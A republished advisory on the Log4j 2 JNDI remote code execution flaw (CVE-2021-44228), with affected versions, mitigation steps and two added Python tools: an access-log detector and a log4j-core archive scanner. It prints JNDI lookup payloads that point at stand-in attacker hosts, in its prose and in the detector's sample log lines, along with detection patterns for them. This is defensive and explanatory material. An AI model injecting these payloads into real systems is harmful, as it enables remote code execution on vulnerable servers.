Why the Log4j2 RCE Bug Is a Global Threat and How to Fix It
The Log4j 2 remote code execution vulnerability (CVE-2021-44228, CNVD-2021-95914) affects any Java application that bundles Log4j 2 versions 2.0 through 2.15.0-rc1. It allows unauthenticated attackers to execute arbitrary code and requires immediate inventory, patching, and hardening across all affected systems.
Vulnerability Overview
The Apache Log4j 2 library (package org.apache.logging.log4j) contains a remote code execution (RCE) flaw caused by unsafe JNDI lookups. When a log message includes a specially crafted string, Log4j 2 parses it, performs a JNDI lookup, and can load arbitrary classes from an attacker‑controlled LDAP or RMI server. This gives the attacker full control of the host process.
Affected Versions
All Log4j 2 releases from 2.0 up to and including 2.15.0‑rc1 are vulnerable. Versions released after the fix (2.15.0‑rc2 and later) disable the dangerous lookup by default.
Exploitation Mechanism
An attacker injects a payload such as ${jndi:ldap://attacker.com/a} into any field that is later logged (e.g., HTTP headers, usernames, error messages). Log4j 2 evaluates the expression, contacts the LDAP server, downloads a malicious Java class, and executes its static initializer.
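Because the injected values arrive through ordinary request fields, the earliest place a defender can see them is the web server access log. The following detector is an added example, not code from the original article: it parses constructed combined-format log lines (the sample entries, hosts and hostnames are invented for this illustration) and flags any field carrying a Log4j 2 lookup expression, labelling the jndi: form explicitly. The URL-decoding step is an assumption about how the request line is recorded; adjust it to your server's logging configuration.

```python
"""Added example (not part of the original article): flag Log4j 2 lookup
expressions in web server access logs. The sample log lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Apache/Nginx "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)
# Any Log4j 2 lookup expression; nested forms still begin with "${".
LOOKUP_RE = re.compile(r"\$\{")
# The JNDI lookup the article describes, with the schemes it names plus dns.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns)\s*:", re.IGNORECASE)

# Constructed sample: one clean request, one User-Agent carrying the article's
# payload shape, one URL-encoded non-JNDI lookup, one payload in the Referer.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api?user=%24%7Benv:USER%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"
203.0.113.10 - - [10/Dec/2021:12:00:04 +0000] "POST /form HTTP/1.1" 200 64 "http://example.test/${jndi:rmi://203.0.113.50/x}" "okhttp/4.9.0"
"""


@dataclass
class Finding:
    line_no: int
    field: str
    kind: str       # "jndi-lookup" or "lookup-expression"
    value: str


def classify(value: str) -> Optional[str]:
    """Return the finding kind for one field value, or None if it looks clean."""
    decoded = unquote(value)   # "%24%7B" is the same "${" once the server decodes it
    if JNDI_RE.search(decoded):
        return "jndi-lookup"
    if LOOKUP_RE.search(decoded):
        return "lookup-expression"
    return None


def scan_access_log(text: str) -> List[Finding]:
    """Check every logged field of every line, since any of them may reach a logger."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue   # unparseable line; a real tool would count these separately
        for field in ("request", "referer", "user_agent"):
            kind = classify(m.group(field))
            if kind:
                findings.append(Finding(line_no, field, kind, m.group(field)))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} in {f.field}: {f.value}")
```

Treating every "${" in untrusted input as a finding, not only the jndi: form, is deliberate: the lookup syntax itself has no legitimate reason to appear in a User-Agent or Referer, so the broader rule catches variants the narrow pattern would miss while still ranking the JNDI case highest.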
Impact
Log4j 2 is embedded in a large proportion of Java‑based software (web frameworks, application servers, data processing engines, etc.). Consequently, more than 90 % of Java applications are potentially exploitable. The attack requires no user interaction beyond sending the malicious data, making it trivial to weaponize across any industry.
Mitigation Steps
1. Identify all assets that include Log4j 2. Scan binaries, container images, and dependency manifests for the log4j-core artifact.
2. Verify the version of each instance. If the version falls in the vulnerable range, proceed to remediation.
3. Upgrade to a patched release (2.15.0-rc2 or later). The official release is available at https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2.
4. Apply temporary mitigations if an immediate upgrade is not possible:
   - Add the JVM startup option -Dlog4j2.formatMsgNoLookups=true.
   - Place a file named log4j2.component.properties on the application classpath containing the line log4j2.formatMsgNoLookups=true.
   - Upgrade the JDK to a version that includes the fix for the JNDI lookup (e.g., JDK 11.0.1, 8u191, 7u201, 6u211 or newer).
   - Deploy network-level protections such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS) that block outbound LDAP/RMI traffic from application servers.
5. Validate the remediation by attempting to log the payload again; the log entry should be recorded verbatim without triggering a lookup.
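Steps 1 and 2 are where most teams lose time, because log4j-core is rarely a top-level file: it sits inside WAR and EAR archives, in container layers, or repackaged into a shaded application JAR. The scanner below is an added example, not a tool from the article or from the Log4j project. It walks a directory tree, recurses into nested archives, reads the version from the Maven pom.properties that log4j-core ships with, falls back to the presence of the JndiLookup class when that metadata is absent, and classifies each hit against the range the article gives (2.x releases before 2.15.0-rc2). The sample archives are constructed in a temporary directory so it runs offline; in practice you would call scan_tree() on application roots or extracted image layers.

```python
"""Added example (not part of the original article): offline inventory
scanner for log4j-core in JAR/WAR/EAR trees. Fixtures are constructed.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Present in log4j-core 2.x builds; used when Maven metadata is missing (shaded jars).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0, 2)   # 2.15.0-rc2, the first fixed release named in the article


def parse_version(v: str) -> Optional[Tuple]:
    """'2.14.1' -> (2, 14, 1, inf); '2.15.0-rc1' -> (2, 15, 0, 1); rc sorts before final."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?", v.strip())
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0), int(rc) if rc else float("inf"))


def is_vulnerable(version: str) -> Optional[bool]:
    """True for 2.x older than 2.15.0-rc2, False otherwise, None if unparseable."""
    t = parse_version(version)
    if t is None:
        return None                    # e.g. 'unknown' from a shaded jar: manual review
    return t[0] == 2 and t < FIXED     # Log4j 1.x is outside the scope of this CVE


def find_log4j_core(blob: bytes, path: str) -> List[Tuple[str, str]]:
    """Return (location, version) for every log4j-core in an archive, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return []
    results = []
    with zf:
        names = zf.namelist()
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            results.append((path, m.group(1).strip() if m else "unknown"))
        elif JNDI_CLASS in names:
            results.append((path, "unknown"))   # repackaged copy without Maven metadata
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                results.extend(find_log4j_core(zf.read(name), f"{path}!/{name}"))
    return results


def scan_tree(root: str) -> List[Dict]:
    """Inventory every archive under root; one report entry per log4j-core found."""
    report = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                blob = fh.read()
            for location, version in find_log4j_core(blob, full):
                report.append({"path": location, "version": version, "vulnerable": is_vulnerable(version)})
    return report


# --- constructed fixtures so the example runs offline ---
def make_jar(version: Optional[str]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(JNDI_CLASS, b"")   # placeholder entry; real class bytes are irrelevant here
        if version is not None:
            zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()


def build_sample_tree() -> str:
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(make_jar("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.15.0-rc2.jar"), "wb") as fh:
        fh.write(make_jar("2.15.0-rc2"))
    with open(os.path.join(root, "shaded-app.jar"), "wb") as fh:
        fh.write(make_jar(None))            # log4j-core repackaged without pom.properties
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:   # log4j-core nested inside a web application archive
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0-rc1.jar", make_jar("2.15.0-rc1"))
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    return root


if __name__ == "__main__":
    for entry in sorted(scan_tree(build_sample_tree()), key=lambda e: e["path"]):
        print(f'{entry["vulnerable"]!s:5}  {entry["version"]:12}  {entry["path"]}')
```

Entries reported as "unknown" are not false positives: the JndiLookup class is present but the version cannot be read, which is exactly the shaded-dependency case a manifest-only scan misses, so they belong at the top of the manual review queue rather than at the bottom.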
Additional References
National vulnerability database entry: CNVD-2021-95914. Security vendors have published detailed advisories; consult them for environment-specific hardening.
This article has been distilled and summarized from source material, then republished for learning and reference.
ITPUB
Official ITPUB account sharing technical insights, community news, and exciting events.